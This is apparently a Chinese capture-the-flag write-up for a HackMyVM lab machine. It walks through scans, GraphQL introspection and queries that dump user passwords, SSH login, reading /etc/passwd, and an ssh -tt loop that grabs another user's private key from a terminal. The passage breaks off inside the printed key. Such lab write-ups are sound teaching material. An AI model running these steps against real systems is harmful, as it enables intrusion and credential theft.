{"id":572,"date":"2024-04-16T15:27:27","date_gmt":"2024-04-16T07:27:27","guid":{"rendered":"http:\/\/162.14.82.114\/?p=572"},"modified":"2024-04-16T15:27:27","modified_gmt":"2024-04-16T07:27:27","slug":"hmv-_-flossy","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/572\/04\/16\/2024\/","title":{"rendered":"hmv[-_-]Flossy"},"content":{"rendered":"

Flossy<\/h1>\n

\"image-20240416133634190\"<\/div>
\n
\"image-20240416133717717\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
rustscan -a 192.168.0.104 -- -A<\/code><\/pre>\n
Open 192.168.0.104:22\nOpen 192.168.0.104:80\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n| ssh-hostkey: \n|   256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOHL4gbzUOgWlMW\/HgWpBe3FlvvdyW1IsS+o1NK\/YbUOoM3iokvdbkFxXdYjyvzkNpvpCXfldEQwS+BIfEmdtwU=\n|   256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC0o8\/EYPi0jQMqY1zqXqlKfugpCtjg0i5m3bzbyfqxt\n80\/tcp open  http    syn-ack Node.js Express framework\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: About Rick and Morty\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Flossy]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.104 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.104\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              jpg,txt,png,php,zip,git\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nProgress: 175330 \/ 1543927 (11.36%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 175872 \/ 1543927 (11.39%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u626b\u4e0d\u51fa\u6765\u5c31\u6682\u65f6\u4e0d\u626b\u4e86\u3002<\/p>\n
\u6f0f\u6d1e\u626b\u63cf<\/h3>\n
nikto -h http:\/\/192.168.0.104<\/code><\/pre>\n
- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          192.168.0.104\n+ Target Hostname:    192.168.0.104\n+ Target Port:        80\n+ Start Time:         2024-04-16 01:39:20 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: No banner retrieved\n+ \/: Retrieved x-powered-by header: Express.\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.\n+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host\n+ End Time:           2024-04-16 01:40:15 (GMT-4) (55 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\"image-20240416134142981\"<\/div><\/p>\n
\u968f\u4fbf\u8f93\u5165\u4e00\u4e2a\u8bd5\u8bd5\uff1a<\/p>\n
\"image-20240416134301335\"<\/div><\/p>\n
\u989d\uff0c\u6293\u4e2a\u5305\uff1f<\/p>\n
POST \/graphql HTTP\/1.1\nHost: 192.168.0.104\nContent-Length: 72\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nContent-Type: application\/json\nAccept: *\/*\nOrigin: http:\/\/192.168.0.104\nReferer: http:\/\/192.168.0.104\/\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\n{"query":"{ character(id:1) { name, status, species, gender, image } }"}<\/code><\/pre>\n
HTTP\/1.1 200 OK\nX-Powered-By: Express\nContent-Type: application\/json; charset=utf-8\nContent-Length: 163\nETag: W\/"a3-85k+FlivGwj6NUbOZXXG5nLcjIQ"\nDate: Tue, 16 Apr 2024 05:45:35 GMT\nConnection: close\n\n{"data":{"character":{"name":"Rick Sanchez","status":"Alive","species":"Human","gender":"Male","image":"https:\/\/rickandmortyapi.com\/api\/character\/avatar\/1.jpeg"}}}<\/code><\/pre>\n
\u5c1d\u8bd5\u67e5\u627e\u4e00\u4e0b\uff1a<\/p>\n
\"image-20240416134943335\"<\/div><\/p>\n
\u53d1\u73b0\u548cGraphQL<\/code>\u76f8\u5173\uff0c\u5c1d\u8bd5\u5728hacktricks<\/code>\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n
https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-web\/graphql<\/a><\/p>\n
\u6784\u9020payload\uff1a<\/p>\n
{"query":"{__schema{types{name,fields{name,args{name,description,type{name,kind,ofType{name, kind}}}}}}}"}<\/code><\/pre>\n
\"image-20240416135742816\"<\/div><\/p>\n
\u53d1\u73b0\u5b58\u5728\uff1a<\/p>\n
\"image-20240416140451970\"<\/div><\/p>\n
\u4ee5\u53ca\uff1a<\/p>\n
\"image-20240416140103255\"<\/div><\/p>\n
\u5c1d\u8bd5\u67e5\u627e\u4e00\u4e0b\uff1a<\/p>\n
{"query":"{users(id:9) { username password } }"}<\/code><\/pre>\n
\"image-20240416140721709\"<\/div><\/p>\n
\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n
\"image-20240416140841230\"<\/div><\/p>\n
\u5f97\u5230\uff1a<\/p>\n
malo\n8YdsA3CkiWx968<\/code><\/pre>\n
\u5c1d\u8bd5ssh\u767b\u5f55\u4e00\u4e0b<\/h3>\n
\"image-20240416141048979\"<\/div>
\n
\"image-20240416141100485\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u256d\u2500malo@flossy ~ \n\u2570\u2500$ pwd\n\/home\/malo\n\u256d\u2500malo@flossy ~ \n\u2570\u2500$ ls -la\ntotal 216\ndrwxr-xr-x  5 malo malo   4096 Apr 16 08:11 .\ndrwxr-xr-x  4 root root   4096 Oct  6  2023 ..\n-rw-------  1 malo malo      4 Oct  7  2023 .bash_history\n-rw-r--r--  1 malo malo    220 Oct  6  2023 .bash_logout\n-rw-r--r--  1 malo malo   3526 Oct  6  2023 .bashrc\ndrwxr-xr-x  3 malo malo   4096 Oct  6  2023 .local\ndrwxr-xr-x 12 malo malo   4096 Apr 16 08:10 .oh-my-zsh\n-rw-r--r--  1 malo malo    807 Oct  6  2023 .profile\ndrwx------  2 malo malo   4096 Oct 10  2023 .ssh\n-rw-r--r--  1 malo malo  51798 Apr 16 08:10 .zcompdump-flossy-5.9\n-r--r--r--  1 malo malo 119920 Apr 16 08:10 .zcompdump-flossy-5.9.zwc\n-rw-------  1 malo malo     84 Apr 16 08:11 .zsh_history\n-rw-r--r--  1 malo malo   3890 Oct  6  2023 .zshrc\n\u256d\u2500malo@flossy ~ \n\u2570\u2500$ cat .bash_history \ntty\n\u256d\u2500malo@flossy ~ \n\u2570\u2500$ cat \/etc\/passwd  \nroot:x:0:0:root:\/root:\/usr\/bin\/zsh\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:109:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\nmalo:x:1000:1000:,,,:\/home\/malo:\/bin\/zsh\ndnsmasq:x:103:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\npolkitd:x:996:996:polkit:\/nonexistent:\/usr\/sbin\/nologin\nsophie:x:1001:1001:,,,:\/home\/sophie:\/bin\/zsh\n\u256d\u2500malo@flossy ~ \n\u2570\u2500$ sudo -l\n[sudo] password for malo: \nSorry, user malo may not run sudo on flossy.\n\u256d\u2500malo@flossy ~ \n\u2570\u2500$ cat \/etc\/cron*                                                                                                                                  1 \u21b5\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ && run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.daily; }\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.weekly; }\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.monthly; }\n#\ncat: \/etc\/cron.weekly: Is a directory\ncat: \/etc\/cron.yearly: Is a directory\n\u256d\u2500malo@flossy ~ \n\u2570\u2500$ cd ..                                                                                                                                           1 \u21b5\n\u256d\u2500malo@flossy \/home \n\u2570\u2500$ ls -la\ntotal 16\ndrwxr-xr-x  4 root   root   4096 Oct  6  2023 .\ndrwxr-xr-x 18 root   root   4096 Jul 22  2023 ..\ndrwxr-xr-x  5 malo   malo   4096 Apr 16 08:12 malo\ndrwxr-xr-x  5 sophie sophie 4096 Oct 10  2023 sophie\n\u256d\u2500malo@flossy \/home \n\u2570\u2500$ cd sophie \n\u256d\u2500malo@flossy \/home\/sophie \n\u2570\u2500$ ls -la \ntotal 56\ndrwxr-xr-x  5 sophie sophie 4096 Oct 10  2023 .\ndrwxr-xr-x  4 root   root   4096 Oct  6  2023 ..\n-rw-------  1 root   root    370 Oct 10  2023 .bash_history\n-rw-r--r--  1 sophie sophie  220 Oct  6  2023 .bash_logout\n-rw-r--r--  1 sophie sophie 3526 Oct  6  2023 .bashrc\ndrwxr-xr-x  3 sophie sophie 4096 Oct  6  2023 .local\n-rwxr-----  1 root   sophie  962 Oct  6  2023 network\ndrwxr-xr-x 12 sophie sophie 4096 Oct  6  2023 .oh-my-zsh\n-rw-r--r--  1 sophie sophie  807 Oct  6  2023 .profile\n-rw-r--r--  1 sophie sophie   66 Oct  7  2023 .selected_editor\ndrwx------  2 sophie sophie 4096 Oct 10  2023 .ssh\n-rwxr-xr-x  1 sophie sophie  630 Oct 10  2023 SSHKeySync\n-rwx------  1 sophie sophie   33 Oct 10  2023 user.txt\n-rw-r--r--  1 sophie sophie 3890 Oct  6  2023 .zshrc<\/code><\/pre>\n
\u53d1\u73b0\u8fd8\u5b58\u5728\u4e00\u4e2a\u7528\u6237sophie<\/code>\uff0c\u7ee7\u7eed\u641c\u96c6\u4fe1\u606f\uff1a<\/p>\n
\u256d\u2500malo@flossy \/home\/sophie \n\u2570\u2500$ file SSHKeySync \nSSHKeySync: Bourne-Again shell script, ASCII text executable\n\u256d\u2500malo@flossy \/home\/sophie \n\u2570\u2500$ cat SSHKeySync \n#!\/bin\/bash\n\n# This script must run every minute in pre-prod\n\nsend_private_key() {\n    local user_name="$1"\n    local key_path="\/home\/$user_name\/.ssh\/id_rsa"\n    local admin_tty="\/dev\/pts\/24"\n\n    if [ -f "$key_path" ]; then\n        if [ -w "$admin_tty" ]; then\n            cat "$key_path" > "$admin_tty"\n        else\n            echo "Error: Unable to write to $admin_tty"\n        fi\n    else\n        echo "Error: The private key for $user_name doesn't exist."\n    fi\n}\n\nwhile true ; do\n  USER="sophie"\n  echo "Sending $USER's private key to a high-privileged TTY for quick testing..."\n  send_private_key "$USER"\n  sleep 1m\ndone    \n\u256d\u2500malo@flossy \/home\/sophie \n\u2570\u2500$ tty\n\/dev\/pts\/0\n\u256d\u2500malo@flossy \/home\/sophie \n\u2570\u2500$ ls \/dev\/pts\/*\n\/dev\/pts\/0  \/dev\/pts\/ptmx<\/code><\/pre>\n
\u521b\u5efapts24\u8fde\u63a5sophie<\/h3>\n
\u5c1d\u8bd5\u521b\u5efa\u4f2a\u7ec8\u7aef24\uff0c\u8ba9\u4ed6\u4fe1\u606f\u53d1\u8fc7\u6765\uff0c\u800c\u6211\u4eec\u77e5\u9053\u7684\uff0c\u6bcf\u6b21ssh\u8fde\u63a5\u90fd\u4f1a\u521b\u5efa\u4e00\u4e2a\u4f2a\u7ec8\u7aef\uff0c\u6240\u4ee5\u6211\u4eec\u9700\u8981\u9891\u7e41\u8fdb\u884cssh\u8fde\u63a5\uff0c\u4e00\u76f4\u8f93\u5165\u5bc6\u7801\u662f\u6bd4\u8f83\u9ebb\u70e6\u7684\uff0c\u5c1d\u8bd5\u521b\u5efa\u5bc6\u94a5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
\u256d\u2500malo@flossy ~ \n\u2570\u2500$ pwd   \n\/home\/malo\n\u256d\u2500malo@flossy ~ \n\u2570\u2500$ cd .ssh\n\u256d\u2500malo@flossy ~\/.ssh \n\u2570\u2500$ ssh-keygen \nGenerating public\/private rsa key pair.\nEnter file in which to save the key (\/home\/malo\/.ssh\/id_rsa): \nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/malo\/.ssh\/id_rsa\nYour public key has been saved in \/home\/malo\/.ssh\/id_rsa.pub\nThe key fingerprint is:\nSHA256:zui2pCPL59xkuWnA1l4\/igl6Mrdv9aLmXBE\/\/N85tU8 malo@flossy\nThe key's randomart image is:\n+---[RSA 3072]----+\n|                 |\n|                 |\n|        .        |\n|         +       |\n|   . .  S +      |\n|    + .=o. o    .|\n|   ..o*o+o  .   E|\n| .+o=X**. +  . =.|\n|  +X=X&o.o .  ..=|\n+----[SHA256]-----+\n\u256d\u2500malo@flossy ~\/.ssh \n\u2570\u2500$ ls -la\ntotal 16\ndrwx------ 2 malo malo 4096 Apr 16 08:40 .\ndrwxr-xr-x 5 malo malo 4096 Apr 16 08:40 ..\n-rw------- 1 malo malo 2590 Apr 16 08:40 id_rsa\n-rw-r--r-- 1 malo malo  565 Apr 16 08:40 id_rsa.pub\n\u256d\u2500malo@flossy ~\/.ssh \n\u2570\u2500$ mv id_rsa.pub authorized_keys\n\u256d\u2500malo@flossy ~\/.ssh \n\u2570\u2500$ ls -la\ntotal 16\ndrwx------ 2 malo malo 4096 Apr 16 08:40 .\ndrwxr-xr-x 5 malo malo 4096 Apr 16 08:40 ..\n-rw-r--r-- 1 malo malo  565 Apr 16 08:40 authorized_keys\n-rw------- 1 malo malo 2590 Apr 16 08:40 id_rsa\n\u256d\u2500malo@flossy ~\/.ssh \n\u2570\u2500$ cat id_rsa    \n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAjPqsD8YtZEi0cH9TwSAwvn+aKUcN1fOV24YgqFhL44dfzny8JFhR\n4dxzDznZ63K0HEcE+\/rY7EBbT5xk1QAUzm3ugT60j4wmzMEVkefwxnKEJxqqKFVLDc4oKE\n8pt7pNA3KvCCY4BnAeXI2KBaEx0hOSN82QljkHekXcSPpdxB5CCbImRz8OYhG9FGx5UXhM\nEiQIbRi0I1Tjwnxn79OmT8\/gCrhgR7qrdN9dAuUDZlZbTXBb3Zsg1B\/756HTHSSPZ5+lV\/\nJ62ueMQ55iC0HDhB8YBmUEmLJceTpxKnD7bwGWI2SL1SEJxS1Bo3HJxIJc8QWI20\/2iRXO\njkxqkSx8b0u3xLZdQrr5e+4tcBs04cxzPsdlpsHJr1uoJrgdoco1SJY2RMBJQJlF6j8Qqa\nsYq+ygEc0drjqXIy8J26WgVcCHrvkJPOKx1N7gWqSbuJIZKq3bqlAlAT9KIRgrzjNzUN0l\n8RBzDvliJHcMmHphu6RP9c0EFkjxzxbGFSUwNb3lAAAFgHPPbb5zz22+AAAAB3NzaC1yc2\nEAAAGBAIz6rA\/GLWRItHB\/U8EgML5\/milHDdXzlduGIKhYS+OHX858vCRYUeHccw852ety\ntBxHBPv62OxAW0+cZNUAFM5t7oE+tI+MJszBFZHn8MZyhCcaqihVSw3OKChPKbe6TQNyrw\ngmOAZwHlyNigWhMdITkjfNkJY5B3pF3Ej6XcQeQgmyJkc\/DmIRvRRseVF4TBIkCG0YtCNU\n48J8Z+\/Tpk\/P4Aq4YEe6q3TfXQLlA2ZWW01wW92bINQf++eh0x0kj2efpVfyetrnjEOeYg\ntBw4QfGAZlBJiyXHk6cSpw+28BliNki9UhCcUtQaNxycSCXPEFiNtP9okVzo5MapEsfG9L\nt8S2XUK6+XvuLXAbNOHMcz7HZabBya9bqCa4HaHKNUiWNkTASUCZReo\/EKmrGKvsoBHNHa\n46lyMvCduloFXAh675CTzisdTe4Fqkm7iSGSqt26pQJQE\/SiEYK84zc1DdJfEQcw75YiR3\nDJh6YbukT\/XNBBZI8c8WxhUlMDW95QAAAAMBAAEAAAGACrF82Zlzmfa10Q6nYK+7Yse0\/s\nqH7yGRzVvoIDzKTNDY4IWvk6YrV9Fr3MzLjcNejAKLCz3ktE7RXkGDmHBwI5RNEfqaoYTE\n8KT4qN+J8NOA2KJ6I6MMlVh8zUnr5Sa5briFND4J49sfQm\/t9y1Z5RBc9+ScwfhDa+\/enJ\n54\/EY7RhcANkk\/IwsrZ2Au95IDWyDmjrff+goXWIotLBDGvakL2mRP0UEEflHu8ShD0MBe\nHoqWPUHmBJEEf3ZT2BMMvL6P1cjGuqoEZUtsFe+uV+FFJ+TpYeKxCh5srnXEm80b5WUifD\nCN1XdRZT9I6Oicldk9KS\/+eZuP2Edm0KXBIdHSd2GI+5snvO2Pv8e4F7hC1Nlm7eknGnF4\nfT\/vIfheNMN3j\/8wzirTckT0Mu62FXofBANg3biOV1w0Mnxoy06NRuvkVqxl6MWLzFC4yo\nZKCC6rHx1pG94O6AJjW4puHGLGSkM5a6sAh6tr1yYkmGbpSlHXheU1B03zbvjMfpJhAAAA\nwHQBvKTvC\/ZFAeZvITgubmozZ7JtB7tOH8Ku6V4jkCW14t0C1LYiyUpPEhKuiTgjjMMft2\nzTmq3FNkpu\/OEiGrjYqDE\/YZ6fv\/RONh5GrAH9\/dCGzi0cGiMyfABNlLVNKUOXpQPWTRwi\nWU2SU9aVe1L0Kjaeny\/fJrvd3FrOqL7a3NKFrLJ28qWiaSf2uxFL5Zo3PfcsB6eaR6Beeo\nn+qy6WMkO1a36RR5SmrQaLYc9lzJQKb4HzcH4tjI6gsBpCqQAAAMEAxFLq1p3JqvmmmWUP\n6THZPZpMa8yQpQnrUvA8OGwobyJkG43i3uLffZ2VQCE49z\/d572qQFJZ9lzCLJVMfiggnz\n6fn6NFuNqPxEq\/9CdYo4+JqTleVleDjYPhH0uWKVayh0A3Z7jhhvSpb39Nlz556Ygs5RO3\nQH3HK3JdxVMMJ50ctek5HyC41XDTRNRDEtFx5H0IRIarqtf15JKkuDzTKC7YQox9vDUQix\nstDfPjv1+WnXQiR0KhWC3rNJpwzcHtAAAAwQC31RE2D0wFZ4ixmPxeiJ0Z\/gV63mzoK4KQ\n3kadia\/zeafVa3Imi+1N1hRIgBdBQmtXDYVjQtfeX12no0kf6fN\/j6D3ZSmBHV6kDa+kdT\ntJf3jL37eGyyRr3lI+jqcy2ccwsWOSKZxJckPyxZvV+C5GyPMxi3gwyvin7\/zaZfq6jrYI\nmw1RrpRB8VfrgbPJl20BP9kFqb0\/\/jtb666j9Mojy12KmCl\/PW74YGD6ver650UMlfe1i\/\nUUV5c2OU3iTNkAAAALbWFsb0BmbG9zc3k=\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n
\u7136\u540ekali\u5c1d\u8bd5\u4f7f\u7528\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Flossy]\n\u2514\u2500$ vim id_rsa                                                            \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Flossy]\n\u2514\u2500$ chmod 600 id_rsa \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Flossy]\n\u2514\u2500$ ssh malo@192.168.0.104 -i id_rsa \nLinux flossy 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.37-1 (2023-07-03) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Tue Apr 16 08:10:28 2024 from 192.168.0.143\n\u256d\u2500malo@flossy ~ \n\u2570\u2500$ cd \/dev\/pts\n\u256d\u2500malo@flossy \/dev\/pts \n\u2570\u2500$ ls -la\ntotal 0\ndrwxr-xr-x  2 root root      0 Apr 16 07:32 .\ndrwxr-xr-x 17 root root   3300 Apr 16 07:33 ..\ncrw--w----  1 malo tty  136, 0 Apr 16 08:40 0\ncrw--w----  1 malo tty  136, 1 Apr 16 08:42 1\nc---------  1 root root   5, 2 Apr 16 07:32 ptmx<\/code><\/pre>\n
\u5982\u679c\u9000\u51fa\u5c31\u6d88\u5931\u4e86\uff1a<\/p>\n
\u256d\u2500malo@flossy ~\/.ssh \n\u2570\u2500$ cd \/dev\/pts                                                                                                                                \n\u256d\u2500malo@flossy \/dev\/pts \n\u2570\u2500$  ls -la\ntotal 0\ndrwxr-xr-x  2 root root      0 Apr 16 07:32 .\ndrwxr-xr-x 17 root root   3300 Apr 16 07:33 ..\ncrw--w----  1 malo tty  136, 0 Apr 16 08:43 0\nc---------  1 root root   5, 2 Apr 16 07:32 ptmx<\/code><\/pre>\n
\u6240\u4ee5\u6211\u4eec\u4e0d\u80fd\u9000\u51fa\uff0c\u53ea\u80fd\u4e00\u5c42\u4e00\u5c42\u7684\u8fdb\u884cssh\u8fde\u63a5\uff01
\"image-20240416144637745\"<\/div><\/p>\n
ssh\u6709\u4e00\u4e2a\u5f3a\u5236\u5206\u914d\u4f2a\u7ec8\u7aef\u7684\u9009\u9879\u53ef\u4ee5\u5c1d\u8bd5\u8fdb\u884c\u4f7f\u7528\uff1a<\/p>\n
for i in {1..23} ;do ssh -tt 0 "sleep 1000 &"; done<\/code><\/pre>\n
    \n
  • \u7b2c\u4e00\u4e2a-t<\/code>\u5f3a\u5236ssh\u5206\u914d\u4e00\u4e2a\u4f2a\u7ec8\u7aef\uff0c\u7b2c\u4e8c\u4e2a-t<\/code>\u5219\u5f3a\u5236\u8fdc\u7a0b\u547d\u4ee4\u4e5f\u5728\u4f2a\u7ec8\u7aef\u4e2d\u8fd0\u884c\u3002<\/li>\n
  • 0<\/code> \u8868\u793a\u5728\u4f2a\u7ec8\u7aefpts0<\/code>\u4e2d\u6267\u884c\uff0c<\/li>\n
  • sleep 1000 &<\/code> \u8868\u793a\u540e\u53f0\u6267\u884csleep\uff0c\u6682\u505c\uff0c\u8fd9\u6837\u5c31\u4e0d\u4f1a\u963b\u585essh\u8fde\u63a5\uff0c\u4e14\u53ef\u4ee5\u4fdd\u5b58pts<\/li>\n<\/ul>\n
    \u7136\u540e\u8fde\u63a5\u4f2a\u7ec8\u7aef0\u5373\u53ef\uff1a<\/p>\n
    \u256d\u2500malo@flossy \/dev\/pts \n\u2570\u2500$ ssh 0      \nLinux flossy 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.37-1 (2023-07-03) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Tue Apr 16 08:57:47 2024 from 127.0.0.1\n\u256d\u2500malo@flossy ~ \n\u2570\u2500$ tty\n\/dev\/pts\/24<\/code><\/pre>\n
    \u7136\u540e\u7b49\u5f85\u4e00\u4f1a\u5c31\u4f1a\u53d1\u8fc7\u6765\uff1a<\/p>\n
    \u256d\u2500malo@flossy ~ \n\u2570\u2500$ -----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAlfKkxqQRaakvwCsUmqbXFm0cdI4zkp9UcejsdWhZKbuq+9l8l6tP\nNic4xIoq1S++4Xlj8acA9oJG3yFSgwsBNIaqAJq1zxSpDnzBBpSIqZk2OmkHw8BNBth98D\n3RKB5d1SOq0pNiBk4dtQ\/QGgd7S30oHNlqF524Nf4jCJxkMLUk527Ga+cjPmM068DtOZMF\nxfY\/gWrnjk44tigt4QP4hkmMEtshPps4SF6dm544FYghYs+rgCH9tx+DfUl7ZFLnBviGL9\nRzN7yQLUV\/BPFod8SPihd\/s7bSMGfBvopCWFcueL0xAd22Q7CU1jSg4W6+aSfbCSRND3ik\ntz\/SsWN2\/RR2H+MQxB11J5qvLFxq291B0Znoi5sgARZUihDihjhPyVL0dco2wrQtL6ey2B\nedRtX24GejoGuvdqd3\/qHi5R35sZ4zcUCEldNwq0aC\/b3EU\/cmu16nmDuhJZpT2ILj35cr\nng8Faf39ZAeIRFKsyfibnRMxoBwLkWWyEs8h2APLAAAFiGZJHbxmSR28AAAAB3NzaC1yc2\nEAAAGBAJXypMakEWmpL8ArFJqm1xZtHHSOM5KfVHHo7HVoWSm7qvvZfJerTzYnOMSKKtUv\nvuF5Y\/GnAPaCRt8hUoMLATSGqgCatc8UqQ58wQaUiKmZNjppB8PATQbYffA90SgeXdUjqt\nKTYgZOHbUP0BoHe0t9KBzZaheduDX+IwicZDC1JOduxmvnIz5jNOvA7TmTBcX2P4Fq545O\nOLYoLeED+IZJjBLbIT6bOEhenZueOBWIIWLPq4Ah\/bcfg31Je2RS5wb4hi\/Ucze8kC1Ffw\nTxaHfEj4oXf7O20jBnwb6KQlhXLni9MQHdtkOwlNY0oOFuvmkn2wkkTQ94pLc\/0rFjdv0U\ndh\/jEMQddSearyxcatvdQdGZ6IubIAEWVIoQ4oY4T8lS9HXKNsK0LS+nstgXnUbV9uBno6\nBrr3and\/6h4uUd+bGeM3FAhJXTcKtGgv29xFP3Jrtep5g7oSWaU9iC49+XK54PBWn9\/WQH\niERSrMn4m50TMaAcC5FlshLPIdgDywAAAAMBAAEAAAGAOMcNhJfYbhFdnt7RKPQWyoubND\nkqJxFEqPNBIf3WkTpZ9o42Irn\/vuogES+eI2Y2WWsdIIITl8PhsRiNhUgz9x8snRj30ccp\ncm5jqqmwi8OTaI+fnIwivn5YRZEqsw